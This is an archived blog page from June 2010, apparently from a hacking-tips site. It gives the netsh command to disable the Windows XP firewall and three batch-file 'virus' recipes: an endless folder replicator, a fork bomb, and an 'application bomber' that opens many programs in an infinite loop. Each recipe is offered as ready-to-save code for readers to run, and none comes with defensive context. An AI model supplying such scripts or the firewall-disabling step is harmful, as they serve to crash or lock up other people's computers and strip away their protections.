Archive for June, 2010

Enabling/Disabling the firewall using command line

0

Disable Windows XP firewall
netsh firewall set opmode disable

Enable the Windows XP firewall
netsh firewall set opmode enable

Folder Replicator Virus

0

open notepad & type
:loop
md Virus
cd Virus
goto loop
save as raj.bat

Fork Bombing

0

open notepad & type
@echo off
:loop
Explorer
Call fork.bat
Goto loop
save as hackingarticles.bat

Application Bomber

0

open notepad & type
@echo off
:loop
start notepad
start compmgmt.msc
start mspaint
start osk
start cmd
start explorer
start control
start calc
goto loop
save as raj.bat

Go to Top